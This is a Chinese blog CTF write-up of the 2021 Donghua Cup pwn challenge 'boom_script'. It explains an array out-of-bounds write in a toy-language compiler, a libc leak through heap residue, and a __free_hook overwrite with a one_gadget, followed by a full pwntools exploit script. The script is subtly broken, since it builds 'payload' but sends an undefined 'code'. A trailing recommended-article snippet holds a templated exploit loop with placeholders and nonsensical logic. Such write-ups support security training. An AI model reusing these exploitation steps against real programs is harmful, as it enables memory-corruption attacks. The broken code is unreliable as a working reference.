2021 东华杯 pwn boom_script

最新推荐文章于 2023-11-29 20:22:39 发布
最新推荐文章于 2023-11-29 20:22:39 发布
阅读量304 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yongbaoii/article/details/121511700

在这里插入图片描述
RELRO没开。

在这里插入图片描述
程序本身的逻辑是实现了一个boom语言的编译器,我们输入boom语言会给我们编译。

但是对于我们做题人来讲,因为程序体量太大,我们逆向起来会非常麻烦,所以我们结合他一些可能会出漏洞的地方,进行一些猜测并尝试。

我们最后将漏洞点放在了他的array,也就是数组的地方。
猜测他数组可以造成越界。

我们来检查一下对不对。

我们就简单的

array arr[30];
arr[25]=1;
arr[26]=1;
arr[27]=1;
arr[28]=1;
arr[29]=1;
arr[32]=1;

在这里插入图片描述
我们明显发现有越界,现在的问题就是如何能把这个越界利用起来。

首先我们要再去看一下malloc、free函数是在什么情况下使用的,便于我们使用数组越界进行利用。

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
我们结合代码,结合我们的调试我们发现,字符串的赋值功能就是释放掉原来的chunk然后再申请一个chunk。

我们通过阅读代码发现
在这里插入图片描述
程序通过这个地方来决定使用的是什么功能。

我们要注意到prints功能。
在这里插入图片描述注意到prints的功能对应的数字是0x8a

找到实现这个功能的函数
在这里插入图片描述我们可以通过prints一个小字符串,来泄露chunk残留的libc地址。

那么我们的利用过程如下:

通过字符串赋值来获得一个大点的chunk。然后通过prints泄露libc地址
在这里插入图片描述
剩下的我们就正常还是通过赋值得到chunk然后越界写就好了。

exp部分有参考小绿草的大佬,表示感谢!

from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"

local = 1
if local:
    r = process('./boom_script')
else:
    r = remote("192.168.40.178",8999)
    
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()

def debug():
    gdb.attach(r)
    pause()
    
def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))


payload = ""
payload += "array a[1];"
payload += "array b[1];"
payload += "str=\""+"a"*0x500+"\";"
payload += "str=\""+"a"*0x800+"\";"
payload += "prints(\" \");"
payload += "libc_base=0;"
payload += "inputn(libc_base);"
payload += "free_hook=libc_base+"+str(0x18c8)+";"
payload += "one_gadget=libc_base+"+str(0x4497f)+";"
payload += "str=\""+"a"*0x68+"\";"
payload += "str1=\""+"a"*0x8+"\";"
payload += "str2=\""+"a"*0x8+"\";"
payload += "str2=\""+"a"*0x28+"\";"
payload += "str1=\""+"a"*0x28+"\";"
payload += "a[5]=free_hook;"
payload += "str3=\""+"a"*0x8+"\";"
payload += "array c[0];"
payload += "c[0]=one_gadget;"
payload += "str1=\""+"\x00"*0x8+"\";"

sla("$", "1")
sla("length:\n", str(len(code)))
debug()
sla("code:\n", code)
libc_base = u64(ru('\x7f')[-6:] + '\x00\x00')
lg("libc_base", libc_base)

sd(p64(libc_base))

ti()
2021东华pwn部分wp
eeeeeight的博客
11-01 1671
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
pwn2021 东华(部分)
woodwhale的博客
10-31 3696
pwn2021 东华(部分) 1、cpp1 典中典之堆溢出,改俩堆块重叠进入unsorted bin,然后申请其中一个回来,就能泄露libc。 之后就是堆溢出改fd为free_hook写入system #!/usr/bin/python # -*- coding: UTF-8 -*- # ----------------------------------- # @File : exp.py # @Author : woodwhale # @Time : 2021/10/31 12
东华-pwn-cpp1
One_p_Two_w的博客
11-11 3099
东华-pwn-cpp1 前一阵子东华pwn题,比赛时候没做出来,说起来那时候我才刚学到fastbin attack,天天在和libc2.23打交道,比赛的时候时候看见libc全是2.31的…孩子人都傻了,遂去misc划水。。。(r n m,退钱!) 现在终于看了tcache,寻思试一下之前的赛题,于是有了这篇博客,做起来发现,好像并没有那么难? 我本地的环境就是2.31的,所以就在本地尝试复现了一下,文件已经传到了网盘,想复现的师傅们可以在这里下载 分析 main函数如下 菜单 new new中允
JS函数BOOM、DOM、事件
weixin_30550271的博客
04-16 545
screen对象 */ console.log(screen.width);//屏幕宽度 console.log(screen.height);//屏幕高度 console.log(screen.availWidth);//可用宽度 console.log(screen.availHeight);//可用高度 屏幕高度-任务栏高度 /* * location对象 * * 完...
pwnscripts:非常简单的脚本可以加快二进制漏洞利用程序的创建
05-06
pwnscripts(0.6.0) 非常简单的脚本,可以加快二进制漏洞利用程序的创建。 要使用,请pip install pwnscripts或运行 git clone https://github.com/152334H/pwnscripts cd pwnscripts pip install -e . 并将from pwn import *替换from pwn import * from pwnscripts import * ,例如 from pwnscripts import * context . binary = './my_challenge' ... 另外, libc_database()扩展需要 。 您可能需要查看user_tests_and_examples.py中的一些示例。 特征 Pwnscripts具有许多不同的功能。 图书馆 像之类的总是感到不完整。
boom.js:用于构建DOM树的简单模块
05-06
繁荣是荷兰人的树。 boom.js是一个用于构建DOM树的简单库。 只需放置一个boom (树),将其传递给容器选择器和一些takken (分支),它将呈现您在容器中指定的DOM树。 这使您可以以编程方式呈现DOM树。 压缩后只有〜1kb,不需要jQuery或其他依赖项。 用法 通过npm安装: npm install boom.js 导入应用 //ES5 var boom = require ( 'boom.js' ) . boom var tak = require ( 'boom.js' ) . tak //ES6 :) import { boom , tak } from 'boom.js' 或仅包含boom.js / boom.min.js,即可在全球范围内使用boom和tak < script src =" node_modules/dist/boom.min.js "
pwn1_sctf_2016
weixin_56301399的博客
07-21 1855
这道题目的情况是多了个替换字符的函数,使得一个I在存储中变为you,一个字节变为三字节,这时候需要根据情况确定多少字符使得栈溢出。 还是照常的流程,但题目已经开始变化了,我现在还是一知半解迷迷糊糊的状态,害,菜狗子还需努力。......
[SWPUCTF 2021 新生赛]gift_pwn
m0_74355719的博客
11-29 616
【代码】[SWPUCTF 2021 新生赛]gift_pwn
[pwn]VMpwn:2020网鼎青龙组pwn boom2 wp
热门推荐
Breeze的博客
05-12 1万+
2020网鼎青龙组pwn boom2 wp 比赛的时候被特斯拉那道隐写恶心到了,导致一直在肝那道题,也没看pwn,赛后看了组内大佬的wp,感觉这道pwn也不是很难,于是自己又做了一遍。这道题总共80+队伍做出来,反而更难的pwn1 boom1却有200+队伍做出来,不得不说py真的很严重,赛后我看群里说比赛的时候好像有一份pwn1的exp在全网流通,有点小恶,但也无所谓,名词不重要,自己学到东西才是最重要的。 题目分析 首先检查一下安全策略: 安全策略全开,然后简单看一下逻辑: 执行之后让你输入co
网鼎第一场 部分re crypto pwn 题解
qq_41071646的博客
05-11 1430
这次没想到还拿了一道re的一血、 题目名称 re bang 一看题目就知道需要dump dex 正好手边手机开启了frida 直接dump dex 脚本一把梭,然后直接反编译 发现flag 拿到了一血,, 题目名称 re signal 这个题目 自己实现了vm 自己写了一个脚本(不要吐槽我的拼音,当时有点着急 就没有想那么多) 自己写了一个python代码模拟了一下 lists=[10,4,16,8,3,5,1,4,32,8,5,3,1,3,2,8,11,1,12,8,4..
pwntools 简单用法
xuqi7
05-07 3308
官方一个示例 remote.py   """ Example showing how to use the remote class. """ from pwn import * # 也可以直接 import pwn sock = remote('127.0.0.1', 9001) # 连接远程服务 print sock.recvline() # ...
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 9701
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
go pwn 2022 虎符 gogogo
yongbaoii的博客
04-09 7231
刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。
解决LibcSearcher找不到合适libc(更新libc)
yongbaoii的博客
02-09 6914
1 尝试直接更新 进入LibcSearcher/libc-database中运行./get文件即可进行更新。 可能./get更新不了。 2 究极更新 cd LibcSearcher rm -rf libc-database git clone https://github.com/niklasb/libc-database.git 然后进入libc-database执行./get 可能会这样提醒。 那么就看需要点啥更新点啥,一般是 ./get ubuntu #一般pwn题环境就Ubuntu,所以有第一个
linux 安装codeql环境 (二)codeql database create通过报错分析其流程
yongbaoii的博客
04-10 6161
尝试过很多解决方案之后无果 决定研究一下它的整个流程
linux 安装codeql环境 (一)基本环境搭建
yongbaoii的博客
04-10 5700
cccccccodeql
PWN 更换目标程序libc
yongbaoii的博客
12-29 5289
网上这方面我感觉还是比较少的,在这里把我的方法拿出来防止大家踩坑。 这一块知识不大懂的推荐去看《程序员的自我修养》第八章共享库那一章节。 我们换libc的原因是在调试程序的时候我们本地的libc可能跟远程计算机上的libc不一样,不是可能,基本上都不一样,那么我们程序加载libc之后里面的一些函数的偏移地址就会跟我们想的不一样,从而导致脚本不停出错。那么就需要我们去把程序所链接的libc从本地libc更换成远程服务器上的libc。 原理简单的说就是用patchelf把程序依赖libc的那个软连接改一下,或者
go runtime
yongbaoii的博客
04-01 4754
Runtime 包括go 调度 go内存分配 go GC
LibcSearcher 安装 错误处理 与使用
yongbaoii的博客
10-15 4629
00 开始 因为libc库有多个版本,不同版本里面的数据偏移不一样,在答题时往往服务器的版本与你获得的版本不一致或者直接不给你libc库,这个时候就用到了libcsearcher。 当然这种情况往往还可以参考dynelf ,这里就先不考虑了。 01 安装 git clone https://github.com/lieanu/LibcSearcher.git cd LibcSearcher python setup.py develop 02 错误处理 报错 处理方式 在root权限下安装 03 使用
pwn2_sctf_2016
最新发布
02-16
### 关于 SCTF 2016 中 pwn2 题目的解析 在 SCTF (Security Capture The Flag) 2016 的比赛中,`pwn2` 是一道涉及栈溢出漏洞利用的题目[^1]。此题允许参赛者通过特定输入来覆盖返回地址并控制程序执行流程。 #### 漏洞环境描述 该挑战提供了一个存在缓冲区溢出缺陷的应用程序实例。应用程序接收用户输入作为处理对象,在缺乏适当边界检查的情况下将其复制到固定大小的内存区域中。这种设计使得攻击者能够精心构造恶意数据包以破坏堆栈结构,并最终实现任意代码执行的目的。 #### 解决方案概述 为了成功完成这一任务,参与者通常采取以下策略: - **确定偏移量**:首先需要找到合适的字节填充数量以便精确地覆盖目标位置而不影响其他重要部分的数据完整性。 - **泄露 SSP 地址**:由于开启了 Stack Smashing Protector(SSP),即栈保护机制,因此还需要想办法获取其实际值用于后续操作中的调整校验计算。 - **定位 libc 基础地址**:如果远程服务器上使用的 glibc 版本未知,则可能需借助某些方法推测或直接读取相关指针从而得知确切基址。 - **构建有效载荷**:最后一步就是组合上述信息形成完整的 exploit chain ,比如采用 ret2libc 技巧调用 system 函数启动 shell 或者跳转至已知 gadgets 实现相同效果。 ```python from pwn import * context(log_level="debug") flag_addr = 0x600DC0 for attempt in range(1, 101): try: conn = remote('example.com', port_number) padding = b'a' * offset_to_return_address # 计算得出的确切偏移量 payload = ( padding + pack(flag_addr, 64) + ... # 可能还包括其他的 ROP chains 组件 ) conn.recvuntil(prompt_string) conn.sendline(payload) response = conn.recvall(timeout=timeout_seconds).decode() print(f"[Attempt {attempt}] Received: ", response.strip()) if success_pattern in response.lower(): break except Exception as e: log.error(e) finally: conn.close() if not 'success pattern found': raise ValueError("Failed after multiple attempts.") ``` 这段 Python 脚本展示了如何自动化尝试连接服务端发送特制请求的过程。注意这里 `offset_to_return_address`, `prompt_string`, 和 `port_number` 等变量都需要根据实际情况设定具体的数值;而 `pack()` 方法用来创建适合架构位宽的机器码表示形式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值